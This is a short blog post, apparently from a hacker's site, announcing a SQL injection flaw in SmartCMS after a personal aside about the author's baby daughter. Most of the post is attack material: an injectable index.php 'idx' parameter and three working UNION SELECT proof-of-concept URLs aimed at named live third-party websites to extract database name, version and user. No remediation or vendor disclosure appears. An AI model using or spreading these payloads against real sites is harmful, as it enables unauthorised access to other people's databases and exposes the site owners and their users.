Home vulnerabilities SmartCMS <= SQL Injection Vuln

SmartCMS <= SQL Injection Vuln

By
Sunday, November 25, 2012
Read
Add Comment

Hei you out there... :)

It's been a long time since my last post..
Well i've been busy with many things and i have a daughter now (6 month). Very beautiful and smart daughter (like her father of course! hahahaha..). We call her "amora". :D


[o] SmartCMS <= SQL Injection Vulnerability

Software : SmartMS
Version   : n/a
Vendor   : http://smartcms.nl/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/index.php?idx=[SQLi]


[o] PoC

http://www.smartcms.nl/cms2/sites/1010/index.php?idx=566+AND+1=2+UNION+ALL+SELECT+database()--
http://www.pokey.nl/cms2/sites/1086/index.php?idx=3397+AND+1=2+UNION+ALL+SELECT+version()--
http://www.devriesenrijke.nl/cms2/sites/1077/index.php?idx=2605+AND+1=2+UNION+ALL+SELECT+user()--
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us